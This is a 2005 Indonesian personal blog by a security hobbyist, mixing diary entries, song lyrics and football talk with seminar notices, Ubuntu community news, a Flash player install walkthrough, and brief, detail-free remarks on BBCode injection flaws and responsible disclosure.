    /me lagi seneng banget dengerin lagu ini gara-garanya abis nonton dealova ama adek ... hehhe , thx buat 0byt3 untuk mp3-nya , "dari hati - club80" , "inginku - yovie&nuno" , "OST alexandria - peterpan" .... keren kan playlist di XMMS gw :P

    bicara soal BBM ???

    3 comments
    Kalo ditanya soal kenaikan BBM dan lain lain maka saya cuma bisa mengatakan kalo "Saya mah orang bego yang cuma bisa prihatin sama kejadian itu", jadi penekanannya lebih kepada kepercayaan ke pemerintah (lah dulu anda pilih siapa? untuk jadi presiden? mbok ya beri kepercayaan dunk? , /me yang notabene gak milih siapapun pas PEMILU aja berusaha memberikan kesempatan pada pemerintah .. ) tapi gak lepas begitu aja, mungkin kebobrokan ini emang sudah terlanjur parah terjadi dari dulu , "bom" waktu itu mulai meledak sedikit sedikit , ya mo gimana lagi katanya "minyak dunia" melambung tinggi , nah kalo emang bener mosok negara suruh bayarin (disatu sisi ada yang bilang indonesia kan penghasil minyak juga ? nah lo ? .. apa ini juga gak pake biaya ? .. pusing ach ... )

    Sekarang mah daripada ribut mending introspeksi diri masing masing ,menyalahkan gak akan pernah menyelesaikan masalah (wuik, so` wise banget gw) , misal, apa kita dah pake "listrik" sesuai kebutuhan ? (matiin dunk lampu kalo tidur, dsb .. walau manusia kadang juga lupa , tapi niatnya itu loh ^_*), ya udah kalo BBM naik cobalah seminimal mungkin pengunaannya, toh emang BBM itu barang habis pakai kok, jadi mau gak mau suatu saat akan berkurang dan semoga dengan kenaikan BBM ini akan membuat kita lebih bisa menghargai "ciptaan Tuhan" , minimal kendaraan di kurangilah jumlahnya (SESAK , kebanyakan kendaraan, asap dimana mana , macet dimana mana .... )

    Aku ada ide sedikit ekstrim supaya pembebanan harga BBM sesuai dnegan porsinya, salah satunya "pemberian pajak yang tinggi terhadap kendaraan mewah yang dimiliki oleh orag ornag yang "berada" ", nah uangnya digunain untuk mbantu subsidiin minyak tanah dan gas yang rata rata lebih digunakan rakyat miskin dan menengah dan ini lebih berpengaruh di kehidupan, dan aku rasa ini dah di pikirin juga oleh pimpinan kita dan mudah mudahan kalo mereka gak mengambil cara ini itu lebih dikarenakan ada alasan yang aku gak tahu, dan juga pemberantasan korupsi itu sangat aku dukung ! hukuman yang setimpal buat para koruptor adalah "hukuman mati" , emang sih hukum manusia itu gak akan bisa sempurna, tetapi pemberian hukuman yang berat diharapkan dapat memberi contoh menakutkan bagi yang lain :).

    Sekarang kita cuma harus mengambil hikmahnya dan ini bukan berarti saya mendukung pemerintah dan malah membiarkan mereka (pemerintah, red) semena mena terhadap kita, tetapi cuma berusaha mengambil hikmah dan memperhitungkan untung ruginya , apa dengan demo "harga minyak dunia bisa turun? " atau anda memaksa negara menambahi hutangnya untuk memberi subsidi kepada BBM yang relatif di nikmati oleh kaum berada ??? ....

    Mulailah dari diri sendiri, gak ada salahnya "berhemat" , dan jika ini emang "cobaan" untuk kita maka semoga "cobaan" ini menjadi "PELAJARAN yang SANGAT BERHARGA" buat kita semua !!


    Semua tulisan ini cuma menggambarkan betapa "bodohnya" saya dengan kemampuan berpikir yang terbatas, dan semoga dengan kebodohan saya ini membuat saya lebih baik lagi dalam menyikapi berbagai hal, semoga tulisan yang segelintir ini memberi hikmah pada kita, jika ada yang salah dimata sodara atas tulisan ini mohon dimaafkan :)

    Wednesday, September 28, 2005

    From html to [bbcode]

    0 comments
    Injection never end ... , User user yang sedikit mampu berfikir dan mau berfikir sebenernya sangatlah mudah untuk memanfaatkan semua keleluasaan yang di berikan oleh penyedia layanan , walau efeknya relatif lebih kecil terhadap system ( secara keseluruhan tetapi tidak bisa dipandang sebelah mata ) dan hal ini di dukung pula oleh bantuan web browser yang semakin "user friendly" mengakibatkan hal ini berulang kali terjadi baik dari dulu hingga sekarang.

    Terkait dengan kelemahan yang dimiliki hampir oleh semua CMS yang menggunakan [bbcode] serta [html] dan sekali lagi akibat dukungan browser ditambahi dengan maraknya pengijinan yang diberikan oleh penyedia jasa yang memiliki klien yang besar seperti friendster (mengerti gak kenapa fitur "groups" di non-aktifkan sementara ini ?? *_^) , serta 360 (yang dimotori oleh yahoo) yang memberikan keleluasaan terhadap user untuk mengkostumisasi sendiri tampilan halaman yang dimiliki baik dengan tag [html] dan di bungkus dengan CSS, belum lagi semua parsing inputan tidak diberikan verification code sehingga sangat memungkinkan penggunaan *bot untuk membuat sedikit kekacauan

    Semua ini hanya gambaran betapa Vulnerable-nya lingkungan (red:dunia maya) kita. No destructive idea , just give some opinion to increase your paranoid level *_^ , Sorry ! No technique in detail !

    FM 2006

    0 comments
    Dah hampir 1 taun gak main game eh ternyata FM 2006 Demo Release boleh di donlod di http://downloads.sigames.com/download/401.exe, hehehehe akhirnya GPRS gw akan lembur lagi malem ini buat ngedonlod :P, walau info ini telat (di rilis 12 september kemaren) tapi gpp lah :) .

    Menggingat FM (yang dulunya CM a.k.a Championship manager sewaktu masih kerjasama dengan Eidos) membuat aku teringat masa di asrama , dulu saat masih main CM 00-01 denagn pemain andalanku ronaldinho dan ibrahimovic yang merupakan temuan kebanggaanku dahulu dan selalu membawa klub yang aku "tukangi" menjadi tidak terkalahkan.

    CM juga yang yang menjadikan aku murni "maniak" bola , baik itu game bola itu sendiri (meskipun aku gak pernah menang main winning 11 serta FIFA di PS sama sepupuku, tapi dah lumayan main fifa 2002 di XDA02 gw dengan level hard !), main bola lapangan, futsall (walau dari smu aku dah suka bola), nonton semua liga (liga serie A, english premier league, liga jerman, spanyol , prancis, J league, dsb, dan juga liga indonesia meski aku benci supporternya yang rusuh, hidup sriwijaya FC !), dan juga game online di http://fantasy.premierleague.com serta http://en.uclfantasy.uefa.com.

    Well, U know what ? I love futbol

    Monday, September 26, 2005

    !oprex ?

    0 comments
    Akhirnya .. sempet juga buat riset (maksute , nyentuh laptop :P) , setelah hampir 2 minggu serasa makin menjauh dari dunia "byte" ini . Semalem sempat mainin Redfang yang merupakan salah satu tools buat assessment bluetooth, sambil memperdalam hcitool sama sdp , kayaknya belajar bluetooth asik juga :P

    Selain itu sekalian memperdalam konfig Apache (sekure apache) plus .ht*

    Walaupun belum berkesudahan dengan hasil yang memuaskan untuk di bahas apalagi dijadikan sebuah tulisan (artinya masih sesuai yang di ketahui, "still dont invent anything new") ,tapi cukup lumayan memberikan "shock therapy" ke otak-ku ini .. hiks ... hiks (wuih kesannya :P) ..

    Go.. Go ... Go

    Saturday, September 24, 2005

    [info] Paper Seminar UPN

    0 comments
    from: "Ini y3dips Lho"
    Date: Fri Sep 23, 2005 4:55pm
    Subject: [info] Paper Seminar UPN

    salam,

    Bagi temen temen yang tidak berkesempatan untuk mengikuti secara
    langsung seminar echo di UPN kemarin maka dapat mendonlod bahan
    presentasinya disini ..

    [1]*
    - y3dips
    - judul paper : D`Art of Thinking [re-write]
    - http://geocities.com/paperecho/ArtofThinking_re-write.pdf

    [2]
    - z3r0byt3
    - judul paper : Hack or HAcked ( linux hacking )
    - http://mirror2.echo.or.id/echo/events/upn/z3r0byt3_upn_paper.pdf

    semoga bermanfaat


    * : untuk film pen-test gaining access yang dibuat khusus untuk
    menggantikan demo (php inject ,backdooring , reverse shell) dan telah
    di include-kan di dalam cd untuk peserta belum bisa di aplod di
    karenakan keterbatasan b/w ..

    salam
    ----
    y3dips

    Friday, September 23, 2005

    http://gallery.echo.or.id

    0 comments
    Dokumentasi perjalanan echo yang belum ada apa-apanya dan "syukurnya" sempat terdokumentasikan dapat anda lirik* di http://gallery.echo.or.id

    (*)segala jenis kerusakan pada mata anda tidak ditanggung oleh pihak H.0 !

    Tuesday, September 20, 2005

    Well , I miss Her

    3 comments
    Well, ternyata kangen itu susah ye ... , dan ternyata emang gw kangen banget .. :( [ kayak gak pernah aja :P ] , Cant wait till saturday ...

    Monday, September 19, 2005

    Monday Morning ..

    2 comments
    Abis kejadian kemaren sore aku jadi seneng banget (abis JJS :P), trus lanjut kejadian semalem saat tilpun dia n kita ngobrol sedikit "serius" loh, hehehhe ; eh jam 03.00 dia misscall buat ngajakin sahur lagi :) [inget euy die] , sambil merem melek jadi deh masak air hangat buat bikin teh sama makan nasi + mujair + kecap yang dibeli semalem, gak dapet sayuran abis belinya telat sih :(.

    Abis itu nyalain pc trus i-net , cetting ama icha plus adit (walah nih bocah mah emang kelelawar semua :P, pas jam dah menyentuh jam 5 pagi (subuh duluw sih) gw mo meng-istirahat-kan mata , eh belun juga genap 15 menit (ganjil yah ? :P) XDA gw bunyi lagi ("Wake me up inside , wake me up inside, call my name and save me from my dark" .. heheh OSTnya Dare devil yang jadi ringtone-nye ) n ternyata nyokap gw yang tilpun nanyain kabar trus bilangin kalo bokap gw pulang ke kampungnya dan juga nanyain apakah gw dah menilpun yuk ima ? (udha gw tilpun tapi pan dia pegike jambi , apess) , alhasil mata gw terjaga lagi n jadinya malah curhat di blog ini lageee ... :p

    hum , kira kira ntar gw kuat gak yah soalnya praktis gw tidur cuma 3 jam :( ...

    Saturday, September 17, 2005

    Jogja [UPN] are Rockz!

    13 comments


    Im back to Jakarta again after 10 hour at jogja :lol: ( tiba jam 6.30 pagi hari ini pulang ke jakarta jam 4.30 , wew singkat banget :p ) ... tak lupa pertama dan utama gw mo ucapin makasih buat anak anak UPN jogja yang jadi panitia "seminar securing your system" (dedy h, kosha, icha, adit, henny, ratih, .....). Pokoknya acaranya keren banget deh "Tobh bang..get deh...

    Yang paling keren itu bisa ngasih seminar bareng pak onno lagi (setelah di undip kemaren) , foto bareng , yang paling keren adalah gw balik bareng ma pak onno dan dibayarin boarding passnya lagi (makasih pak yah *_^) dan kita duduk sebelahan lagi, mana banyak di kasih cerita pengalamannya yang sangat bermanfaat banget, dan yang lebih keren lagi, gw lari sore bareng ma pak onno ngejer pesawat karena pesawat dah mo take off dan kita di tungguin orang sepesawat. (kosha nih ngerjain kita :P)

    nih sedikit foto fotonya :) ** picture now on link not prievew

    baru nyampe di stasiun jogya
    dedy h , 0byt3, /me, kosha
    dedy h , 0byt3, /me, icha
    /me 1n Action with d`Art of thinking.
    pesertanya banyak cewenya euy ...
    makan siang sambil foto bersama
    /me dan pak onno

    Friday, September 16, 2005

    Regression

    0 comments
    Close your eyes and begin to relax.
    Take a deep breath, and let it out slowly.
    Concentrate on your breathing.
    With each breath you become more relaxed.
    Imagine a brilliant white light above you.
    Focus in on this light as it flows through your body.
    Allow yourself to drift off as you fall deeper and deeper
    into a more relaxed state of mind.
    Now, as I count back from ten to one,
    you will feel more peaceful and calm.
    Ten. Nine. Eight. Seven. Six.
    You will enter a safe place where nothing can harm you.
    Five. Four. Three. Two. If at any time you need to come back,
    all you must do is open your eyes. One.
    Dream theater - Scenes From A Memory

    Thursday, September 15, 2005

    Sahur .. sahur

    0 comments
    Semalem pas Sms-an aku di tanyain besok puasa gak ? phew .. dah lama banget gak puasa senin kamis ( seinget aku sih terakhir aku puasa senin kamis mungkin lebih kurang 2 tahun yang lalu, wekz ) yang aku ingat sih sering ngelakuin itu pas masih di Asrama :) . Abis itu pas nilpun maleman dikit dia tanyain apa besok aku puasa n dia bilang dia mo puasa besok , hehehe .. pertama sih diem aja dan gak jawab apa apa :) ( soalnya setelah maaqku kambuh "parah" aku jadi sedikit "trauma" dengan meninggalkan jam makan ), abis itu aku pikir pikir kenapa tidak,toh aku cuma di ciptakan dan maaqku juga DIA yang menciptakan (mengerti kan maksudnya ?) :) , so aku sms dia lagi n aku minta dia misscoll aku kalo dia mau sahur, maklum aku selalu kebablasan dalam hal sahur bahkan di puasa wajib (romadhon) pun aku sering gak sahur :) dan syukurnya lagi dia bilang InsyaALLAH dia mau bangunin aku via misscall ( thx, yah ).

    Alhamdulillah, beneran pas jam 3.30 , "bring me to life"-nya evanesence ngebangunin aku (ring tone-nya) , rupanya dia yang misscall 2 kali, Thx yah ;) dan sekarang jam 4.30 lagi nungguin subuh nih , mudah mudahan puasa kita bakal sah dan menjadi pahala buat kita dan bisa jadi awal yang baik menyambut bulan suci romadhon, amin *_^, Makasih sekali lagi yah :)

    Wednesday, September 14, 2005

    Echo Dark Logo

    0 comments

    Gini nih kalo bingung ngapa ngapain jadinya iseng bikin bikin images, maklum pelukis yang gak kesampean buat jadi pelukis :p

    Tuesday, September 13, 2005

    Pojokan kamar gw !

    0 comments


    Inilah pojokan kamar gw yang sempet gw abadikan saat gw iseng iseng :P

    Today is the day ! ...

    0 comments
    Met ultah buat yang ultah hari ini, moga panjang umur dan selalu dalam lindungan Allah S.W.T , semoga dengan bertambahnya usia jadi makin rajin ibadah , makin dewasa dan tercapai semua cita citanya , amin [ end chapter 1 ]

    Paper tuk seminar dah 50% jadi n insyaAllah mo di terusin hari ini agar bisa di emailkan besok ... [ end chapter 2 ]

    Ilmu komputer gw selama seminggu ini rasanya gak ada yang nambah [gak ada hal baru yang dipelajari sih :( ] .. hiks hiks, rasanya "real life" mulai menyita lebih banyak waktuku sekarang, but setelah semalem benerin gitar kopong dan mainin lagu cuma dengan senar 5 dan 6 aja karena senar 1 putus dan senar 3 yang gak beres pemutar senarnya aku rasa mulai memberi sedikit "setoran" berarti pada otak kananku [ end chapter 3 ]

    I think im in love ...... :lol: , hehehe rasanya hari hari jadi lebih indah yah ? , cuma gak tau deh kayaknya tagihan "hallo" gw bakal membengkak :lol: [ end chapter 4 ]

    Semalem nonton "the doors" di TransTV , ngeliat jim morison [lead-vocal] jadi gimana gituh , ngeliat juga proses ngebuat "light my fire" -nya the doors tapi gak tau itu berdasarkan true story atau enggak :) .. hell care is just a movie :P [ end of chapter 5 ]

    Banzai... [ fin ]

    Sunday, September 11, 2005

    "where`s my reality" ??

    0 comments
    Dah hampir 1 minggu ini 'siklus' kehidupan aku jadi "tidak normal" (or "normal") dikarenakan dah hampir seminggu ini pula 'rutinitas' bertemu komputer sudah tidak 2/3 hari lagi , bahkan tak bisa disebut 1/2 hari. Yupe dari pagi sampai sore hari (06.00-18.00) selama seminggu ini aku tidak lagi menghabiskan waktu didepan komputer dan "dunia maya", waktu yang tersisa cuma dari pukul 18.00 - 24.00 (6 jam , 1/4 hari) yang bisa aku gunakan untuk berinteraksi dengan "dunia maya". [ end chapter 1 ]

    Akhirnya semalem bisa puas cerita cerita via telpon dengan seorang "kaum hawa", ugh rasanya "plong" banget (akhirnya..akhirnya..) [ end chapter 2 ]

    Seminar dah tinggal 6 hari lagi dan papernya belun kelar ... Hancurrrrrr ..... hiks hiks [ end chapter 3 ]

    So long and good Night! .. back to my reality , but where ?? [ Fin ]

    Saturday, September 10, 2005

    Wednesday, September 07, 2005

    Jakarta-Bogor PP

    0 comments
    Cape... euy , Ternyata cape banget yah Jakarta-Bogor PP :( (gimana temen temenku yang udah hampir bertahun tahun disana yah?, strong juga mereka :P ), padahal dah pake Bis antar jemput, Praktis hari ini dari pagi sampe sore (saat pulang) aku tidak terkoneksi dengan dunia maya and unbelieveable im still alive (:lol:) , not only that, i dont even touch my laptops from last night (I only touch my PC server last night, for creating id-ubuntu wiki page).

    Mungkin gak beberapa lama lagi hal ini akan jadi rutinitasku meskipun sebelum ini aku sudah sering pulang pergi Jakarta-Bogor, itu dikarenakan "im going to move to the new office" di bogor. Sebenernya masih belum bisa adaptasi sih, waktu 1jam30Menit di bis belum bisa aku manfaatkan dengan maksimal (ciee) , baru bisa mengobati mataku dengan memandangi pemandangan yang jauh (maklum sebelumnya santapan mataku terbatas di ruangan dan layar monitor :P) di jalanan sambil melamunkan banyak hal (einstein said "imagination more important than science", asal bukan ngelanjor :P). Mungkin seharusnya bisa aku isi dengan membaca atau malah ber-istirahat kan *_^ , tapi mungkin nanti yah kalo dah biasa :).

    Anyway paper buat seminar echo tanggal 17 nantipun praktis belum sempet aku sentuh (sorry panitia) meskipun aku dah dapet beberapa point dan bahannya sedikit demi sedikit sudah di kumpulin, so buat panitia jangan khawatir minggu depan "insyaALLAH" aku e-mail-kan.

    Oke, now i need some rest, and open my laptops again for doin somethin usefull :)

    id-ubuntu Wiki page

    0 comments
    Akhirnya kesampean juga buat ngajuin LoCo (LocalCommunity) IndonesianTeam ke ubuntulinux.org , yang sekarang masih tahap "proposed" di LoCoTeamList , serta ngebuat Wiki untuk IndonesianTeam di wiki.ubuntu.com. Untuk Team contact nya gw juga kudu create Wiki di sini(akhirnya harus belajar pake wiki juga :P), "Mestinya rela rela aja dan maklum maklum aja" (wek, kayak dialog kalin (dian satro) di UnguViolet :lol:) kalo harus buat wiki biar http://ubuntulinux.or.id bisa menjadi Legal,( dan mudah mudahan proposed gw di approved, dan kalo di approve gw bakal minta bantuan dari pihak ubuntunya baik untuk hosting, IRCbot sama mailinglist :) ) tapi speed GPRS-nya itu loh yang bikin gw jadi kagak kuat pas ngeditnya, kan kudu prievew dsb , mana pagenya run under SSL lagi .. hiks hiks, so semalem buatnya ampe jam satu malem tuh, pyuh.

    Mudah mudahan ada hasilnya, hidup id-ubuntu !

    Tuesday, September 06, 2005

    Seminar Echo [*updated]

    0 comments
    salam,

    Dikarenakan ada beberapa hal , maka panitia melakukan perubahan jadual,
    seminar yang seharusnya di adakan pada hari jum`at tanggal 16 di ganti
    menjadi hari sabtu tanggal 17 september 2005.

    selengkapnya dapat di lihat di http://seminar.echo.or.id

    terima kasih

    salam
    ---
    y3dips

    Saturday, September 03, 2005

    40 hari ..

    0 comments
    Malam ini adalah malam ke-40 berpulangnya ananda Muhammad Rafli Akbar ke hadapan Sang Khalik, Sebenarnya aku pengen pulang ke palembang untuk ikut syukuran ke-40 harinya tapi apa daya cuti udah abis dan keuanganpun menipis (belum sempet ambil gaji, dan dah keburu libur), alhasil cuma bisa mendoakan agar rafli mendapat tempat mulia di sisi Allah SWT. Amin ya robbal alamin.

    Friday, September 02, 2005

    *New Theme

    0 comments
    Merayakan 1 tahun gw nge-go-blog maka "theme"-nya gw ganti untuk kesekian kalinya. Dengan mengusung tema "Revenge of the Black" (plesetan dari 3rd episode of starwars) , maka warna hitam kembali mendominasi warna theme blog gw yang baru, setelah beberapa bulan sebelumnya di dominasi dengan warna putih serta Book antiqua font maka kali ini warna hitam tadi dipadu dengan font comic Sans.

    Untuk gambar atas.jpg dan bawah.jpg itu diambil dari screen pembuka film "hostage" yang "kewl" banget dengan sedikit modifikasi dan effect via GImp (sebenernya Sin City lebih kewl lagi sih :P), sedikit modifikasi css-nya dan modifikasi banner sana sini.

    Enjoy the theme !

    Thursday, September 01, 2005

    Total Downloaded files

    0 comments
    Pertama tama gw merasa puas, akhirnya GPRS gw bisa berguna banget (**sukses**) walau dengan bantuan ubuntu gw yang bergadang berhari hari (pernah 3 hari 3 malem idup, gw gak habis pikir deh kalo itu M$ apa dia kuat yah ? :lol:), t68i gw plus Downloader for X (walau masih kalah performanya ma IDM tapi yah gimana lagi, its free n please give a little respect !)

    Total gw donlod dah lebih dari 1,5 GB , donlod *iso dari 1 ilve cd , donlod pentest movie beberapa biji + hacking conference + apt-get ubuntu gw, pokoknya gw puas bgt , dan baru kali ini gw merasa 200 rebu gw tidah sia sia (plus 10% pajak :P).

    so..long and good night ....

    Maaf Cintaku

    0 comments
    Ingin kuludahi mukamu yang cantik
    Agar kau mengerti bahwa kau memang cantik
    Ingin ku congkel keluar indah matamu
    Agar engkau tahu memang indah matamu
    .....
    iwan fals :: maaf cintaku
    Abis nonton iwan fals nih di GlobalTV, n pas dia bawain tuh lagu gw jadi inget pas masih "smu" dulu (... de javu... :lol:). Karena suasana hati lagi gimana gitu n kayaknya cocok deh :), yah lumayan deh walau cuma bisa nulis liriknya aja disini, mudah mudahan ada yang jadi seneng (weitzz, bukan elo!!! :P)

    ULTAH eCHo.or.id yang ke-2

    0 comments
    Tepat hari ini (1 september 2005) echo genap berusia 2 tahun.

    Kami selaku staff mengucapkan banyak terima kasih atas semua kerjasama dari teman teman sehingga di usia yang ke 2 ini echo.or.id tetap eksis, selanjutnya kami terus mengharap kerjasama dan bantuannya untuk tahun-tahun mendatang.

    salam
    ---
    y3dips

    Friday, August 26, 2005

    Installing flash player projector

    1 comments
    Installing Macromedia Flash Player 6 - Standalone player (Projector)
    for Linux (Ubuntu, i mean :p)
    y3dips@heaven:~$ wget -c
    http://download.macromedia.com/pub/flash/
    updates/mx/player6/install_flash_player_6_r79_linux_sa.tar.gz

    y3dips@heaven:~$tar -zxf
    install_flash_player_6_r79_linux_sa.tar.gz

    y3dips@heaven:~$cd install_flash_player_6_linux_sa

    y3dips@heaven:~/install_flash_player_6_linux_sa$ ./flashplayer-installer

    y3dips@heaven:~$ cd /home/y3dips/bin/

    [trouble]
    y3dips@heaven:~/bin$ ./gflashplayer
    ./gflashplayer: error while loading shared libraries:
    libstdc++-libc6.2-2.so.3: cannot open shared object file:
    No such file or directory
    [/trouble]


    /* Well at this point i try to check n finding some compat-gcc
    or lib that have connection with this library file but didnt
    find any , also google didnt help me much, well then i give a
    try to find somethin similar n try to make some simbolic links */


    [solve]
    y3dips@heaven:~/bin$ locate libstdc++.so
    /usr/lib/libstdc++.so.5.0.7
    /usr/lib/libstdc++.so.5
    /usr/lib/libstdc++.so.6.0.4
    /usr/lib/libstdc++.so.6

    y3dips@heaven:~/bin$ cd /usr/lib

    y3dips@heaven:/usr/lib$ sudo ln -s libstdc++.so.6
    libstdc++-libc6.2-2.so.3
    Password:
    [/solve]

    /* Yeah, its solve .. :lol: */

    y3dips@heaven:/usr/lib$ cd /home/y3dips/bin/

    y3dips@heaven:~/bin$ ./gflashplayer

    There you go!, you can access it from your Desktop (if you create a
    shortcut during the installation process) have phun ,
    relax n dont panic for some error :lol:

    Quote of me

    0 comments
    "If you cant change the World, change yourself !"
    y3dips lagi seneng bikin quote nih

    Wednesday, August 24, 2005

    quote of the days

    0 comments
    dont hate somethin just because you dont like it
    dont hate somethin just because u cant make fun of it
    dont hate somethin just because the one that u hates like it
    dont hate somethin just because u cant hate another things
    for example : you hate "C" just because u cant code with "C" , or u hate "unix" just because the person that u hates like n doin a perfect things with "unix" . YUCKFOU , get real , n face it !

    Tuesday, August 23, 2005

    Save It for the D .... ?

    0 comments
    Ive dream about a thousand nice dream
    but nothing nicer than u ...
    Ive say a billion word about "gorgeous"
    and its fit on you ...

    Im waiting ...

    Dont know if it was two or only one wings
    but i Try to fly with that wings
    Dont Cry if its only one hand reach
    Ill Grab it and .. Save it..

    Yes, Ill save it for the D...

    Sunday, August 21, 2005

    Advisories release

    0 comments
    Dah Lumayan lama "vakum" buat oprak-oprek CMS buat nemuin "bug" sekalian cobain cms cms baru sapa tau dapat ilmu baru :), wah betul juga ternyata semakin sulit nemuin hole atau bug di CMS cMS sekarang , levelnya sudah pada naik :P

    Kebetulan aku cobain di punBB 1.2.3 eh masih nemu full path (karena 1 variable gak diparsing) kira kira sebulan yang lalu (not yet release advisories), eh ketika aku berkunjung ke situs resminya di http://punbb.org ternyata yang "baru" di rilis adalah versi 1.2.6 dan ternyata sudah meng-cover "full path" yang aku temuin di versi 1.2.3 (padahal tanpa advisories yang di publish, berarti DEVteam yang sudah menemukan dengan sendirinya) :lol:

    Alhasil ,ada jenis vuln baru yang di temuin easyex , sebenernya threat jenis lama cuma saja vuln ini memanfaatkan [IMG] tag dari bbcode , untuk detailnya gw belum bisa expose karena hampir semua forum dan situs yang memanfaatkan BBCODE dengan [IMG] di aktifkan maka akan besar kemungkinan vulnerable dengan "threat level vulnerability" dari yang high sampai ke low.

    Hari ini aku menemukan jenis Vuln ini pada "PUNBB" dan "vBulletin", semuanya berakibat pada "recent and prior version" :) , aku sudah post ke bugtraq berbarengan dengan ke vendor , tetapi untuk ke public persis sama seperti yang terdapat di adv page (no detail exploitation) , sedang untuk vendor di sertai detil eksploitasi, dengan harapan mengurai "chaos" yang mungkin ditimbulkan (hey KIDS, no more feed , K ) :)

    Saturday, August 20, 2005

    Three Musketeers failed

    0 comments
    Dapet 3 Artikel bagus tapi gak ada yang bisa diimplemetasikan dengan sempurna :

    1. Install MacOSx di x86 baik di vmware or native install
    article from : http://www.xplodenet.com/?p=guide
    reason : buset , gede gede banget kebutuhannya , MacOSx availability (gak mungkin , kan gw gak punya) , pake cara lain dengan Developer kit (kudu donlod 2GB-an) , donlod OpenDarwin (ini juga ukurannya gede), walhasil pending duluw ach .. padahal emang otaknya kagak nyampe :lol:

    2. Install Linux di iPOD
    article from : http://www.reidburke.com/ipodlinux-on-2g-ipod-mini/
    reason : Sayang ma ipod gw, itu juga dapetnya dari CTF di BCS05 dan atas kemurahan hati the_day , belum tentu gw bisa punya lagi .. padahal gw pengen bgt coba, tapi mas abodoh dengan pengorbanan .. maybe kalo harga ipod dah murah baru gw cobain :lol: (u may call me a loser ..)

    3. Install GmailFS di linux (ubuntu)
    article from : http://richard.jones.name/..gmail-filesystem.html
    reason : Dah di install Gmailfs-nya + FUSE dan libgmail tapi pas proses mounting terdapat error "fusermount: old style mounting not supported" , dan error itu bukan cuma gw duank yang alamin (hasil googling), bahkan ada yang report ke bugzillanya ubuntu.. bla ..bla . Oke dech maybe i should give a hard try on it .

    Maju terus !!!